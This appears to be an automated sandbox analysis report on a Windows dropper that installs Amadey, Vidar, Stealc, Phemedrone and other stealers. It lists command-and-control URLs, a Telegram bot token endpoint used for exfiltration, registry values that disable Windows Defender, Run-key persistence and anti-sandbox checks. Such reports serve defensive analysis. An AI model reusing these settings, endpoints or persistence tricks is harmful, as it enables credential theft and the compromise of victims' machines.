Analysis
-
max time kernel
146s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
05/03/2025, 17:14
Static task
static1
Behavioral task
behavioral1
Sample
c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe
Resource
win10v2004-20250217-en
General
-
Target
c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe
-
Size
938KB
-
MD5
49b60f16af6a6028755c86cad74bb4ee
-
SHA1
a94d538bebbbcf138c9116f5201009ae14d9c773
-
SHA256
c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67
-
SHA512
dd120b906b034e837c1ede550f5b6d9afdb045ba50aef3cff87473cccd96b51827b2477e3fcb1b8658c5926adb2deaa0f26706dc30f97a6b9fb841f46ff2d314
-
SSDEEP
24576:VqDEvCTbMWu7rQYlBQcBiT6rprG8a0su:VTvC/MTQYxsWR7a0s
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
phemedrone
https://api.telegram.org/bot8073216408:AAGdXWcCmxBIngZx-Z502Gat9NRWpLvPTxU/sendDocument
Extracted
litehttp
v1.0.9
http://185.208.156.162/page.php
-
key
v1d6kd29g85cm8jp4pv8tvflvg303gbl
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Extracted
vidar
ir7am
https://t.me/l793oy
https://steamcommunity.com/profiles/76561199829660832
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Signatures
-
Amadey family
-
Detect Vidar Stealer 11 IoCs
resource yara_rule behavioral2/memory/4420-1089-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4420-1090-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4420-3799-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4420-3800-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4420-3805-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4420-3807-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4420-3810-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4420-3827-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4420-3846-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4420-3853-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/4420-3874-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral2/memory/5356-879-0x0000000000EA0000-0x000000000130C000-memory.dmp healer behavioral2/memory/5356-880-0x0000000000EA0000-0x000000000130C000-memory.dmp healer behavioral2/memory/5356-960-0x0000000000EA0000-0x000000000130C000-memory.dmp healer -
Gcleaner family
-
Healer family
-
Litehttp family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" a59235b83d.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" a59235b83d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" a59235b83d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" a59235b83d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" a59235b83d.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection a59235b83d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" a59235b83d.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" a59235b83d.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" a59235b83d.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications a59235b83d.exe -
Phemedrone
An information and wallet stealer written in C#.
-
Phemedrone family
-
Stealc family
-
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempONUGHFIS9I7KIQFJNSCRLYXBBBVHJEPS.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fd91aeb028.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 50961a4f5f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 191911f265.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a59235b83d.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempUOM7NTIUYDO3GLZCCMLKZE9NBGLHPREH.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 81eb0d0c11.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6d19d80c13.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 730UXSVALTDSRR61MUM.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ab73b377eb.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ FvbuInU.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 23 592 powershell.exe 35 1968 powershell.exe 38 2864 powershell.exe -
pid Process 3248 powershell.exe 8 powershell.exe 624 powershell.exe 592 powershell.exe 1968 powershell.exe 2864 powershell.exe 876 powershell.exe -
Downloads MZ/PE file 21 IoCs
flow pid Process 65 5060 BitLockerToGo.exe 84 3348 BitLockerToGo.exe 38 2864 powershell.exe 333 2112 rapes.exe 34 2112 rapes.exe 34 2112 rapes.exe 34 2112 rapes.exe 34 2112 rapes.exe 34 2112 rapes.exe 34 2112 rapes.exe 34 2112 rapes.exe 34 2112 rapes.exe 34 2112 rapes.exe 34 2112 rapes.exe 34 2112 rapes.exe 234 2112 rapes.exe 234 2112 rapes.exe 23 592 powershell.exe 35 1968 powershell.exe 116 680 191911f265.exe 227 2112 rapes.exe -
Uses browser remote debugging 2 TTPs 4 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 5808 chrome.exe 3136 chrome.exe 116 chrome.exe 1572 chrome.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/files/0x000a000000023d5e-1073.dat net_reactor behavioral2/memory/5116-1087-0x00000000000C0000-0x0000000000120000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 30 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempUOM7NTIUYDO3GLZCCMLKZE9NBGLHPREH.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 50961a4f5f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 81eb0d0c11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 81eb0d0c11.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6d19d80c13.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ab73b377eb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 730UXSVALTDSRR61MUM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempUOM7NTIUYDO3GLZCCMLKZE9NBGLHPREH.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 191911f265.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 730UXSVALTDSRR61MUM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a59235b83d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ab73b377eb.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a59235b83d.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6d19d80c13.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 191911f265.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fd91aeb028.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 50961a4f5f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempONUGHFIS9I7KIQFJNSCRLYXBBBVHJEPS.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempONUGHFIS9I7KIQFJNSCRLYXBBBVHJEPS.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fd91aeb028.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FvbuInU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation pDZWk1j.exe Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation TempONUGHFIS9I7KIQFJNSCRLYXBBBVHJEPS.EXE Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Control Panel\International\Geo\Nation pDZWk1j.exe -
Executes dropped EXE 35 IoCs
pid Process 3868 TempONUGHFIS9I7KIQFJNSCRLYXBBBVHJEPS.EXE 2112 rapes.exe 2760 dd5195d9cc.exe 4460 TempUOM7NTIUYDO3GLZCCMLKZE9NBGLHPREH.EXE 3176 pDZWk1j.exe 3552 pDZWk1j.exe 1852 pDZWk1j.exe 4268 Wlm2fCOKWi.exe 3248 5yWptUDTos.exe 2448 483d2fa8a0d53818306efeb32d3.exe 8 fd91aeb028.exe 2008 285da3311c.exe 1840 285da3311c.exe 3184 285da3311c.exe 1972 50961a4f5f.exe 4052 81eb0d0c11.exe 4428 rapes.exe 2016 6d19d80c13.exe 3228 ce4pMzk.exe 680 191911f265.exe 4600 ab73b377eb.exe 4400 730UXSVALTDSRR61MUM.exe 4088 637ecdac09.exe 5356 a59235b83d.exe 5972 joblam.exe 5128 pDZWk1j.exe 5208 pDZWk1j.exe 5352 Al7lbTeSX0.exe 5576 OF1ZtztMSC.exe 5116 mAtJWNv.exe 4420 mAtJWNv.exe 4636 rapes.exe 3092 SvhQA35.exe 5624 chromium.exe 5656 FvbuInU.exe -
Identifies Wine through registry keys 2 TTPs 15 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 81eb0d0c11.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 50961a4f5f.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine FvbuInU.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine ab73b377eb.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine TempONUGHFIS9I7KIQFJNSCRLYXBBBVHJEPS.EXE Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine fd91aeb028.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 6d19d80c13.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 191911f265.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 730UXSVALTDSRR61MUM.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine a59235b83d.exe Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine TempUOM7NTIUYDO3GLZCCMLKZE9NBGLHPREH.EXE Key opened \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe -
Loads dropped DLL 47 IoCs
pid Process 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe 5624 chromium.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features a59235b83d.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" a59235b83d.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 7 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\cejMam5S\\Anubis.exe\"" ce4pMzk.exe Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ab73b377eb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104930101\\ab73b377eb.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\637ecdac09.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104940101\\637ecdac09.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\a59235b83d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104950101\\a59235b83d.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dd5195d9cc.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104610101\\dd5195d9cc.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104620121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\191911f265.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104920101\\191911f265.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0008000000023c42-53.dat autoit_exe behavioral2/files/0x000c000000023be8-500.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
pid Process 3868 TempONUGHFIS9I7KIQFJNSCRLYXBBBVHJEPS.EXE 2112 rapes.exe 4460 TempUOM7NTIUYDO3GLZCCMLKZE9NBGLHPREH.EXE 2448 483d2fa8a0d53818306efeb32d3.exe 8 fd91aeb028.exe 1972 50961a4f5f.exe 4052 81eb0d0c11.exe 4428 rapes.exe 2016 6d19d80c13.exe 680 191911f265.exe 4600 ab73b377eb.exe 4400 730UXSVALTDSRR61MUM.exe 5356 a59235b83d.exe 4636 rapes.exe 5656 FvbuInU.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 3176 set thread context of 3552 3176 pDZWk1j.exe 126 PID 2008 set thread context of 3184 2008 285da3311c.exe 139 PID 8 set thread context of 5060 8 fd91aeb028.exe 142 PID 1972 set thread context of 3348 1972 50961a4f5f.exe 145 PID 5128 set thread context of 5208 5128 pDZWk1j.exe 183 PID 5116 set thread context of 4420 5116 mAtJWNv.exe 190 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempONUGHFIS9I7KIQFJNSCRLYXBBBVHJEPS.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 4 IoCs
pid pid_target Process procid_target 456 3176 WerFault.exe 120 668 2008 WerFault.exe 137 5280 5128 WerFault.exe 181 5460 5116 WerFault.exe 189 -
System Location Discovery: System Language Discovery 1 TTPs 52 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language c1a431d9eeca3c834b656a17dd543835020a9a90a6e5fd28d947dfd058d36e67.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dd5195d9cc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 81eb0d0c11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6d19d80c13.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 191911f265.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempUOM7NTIUYDO3GLZCCMLKZE9NBGLHPREH.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pDZWk1j.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 637ecdac09.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pDZWk1j.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pDZWk1j.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 730UXSVALTDSRR61MUM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ab73b377eb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 637ecdac09.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FvbuInU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 285da3311c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 285da3311c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a59235b83d.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempONUGHFIS9I7KIQFJNSCRLYXBBBVHJEPS.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fd91aeb028.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 637ecdac09.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language pDZWk1j.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 50961a4f5f.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mAtJWNv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mAtJWNv.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3824 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Kills process with taskkill 5 IoCs
pid Process 2372 taskkill.exe 3348 taskkill.exe 4040 taskkill.exe 4256 taskkill.exe 4972 taskkill.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-925314154-1797147466-1467878628-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 836 schtasks.exe 3436 schtasks.exe 2092 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
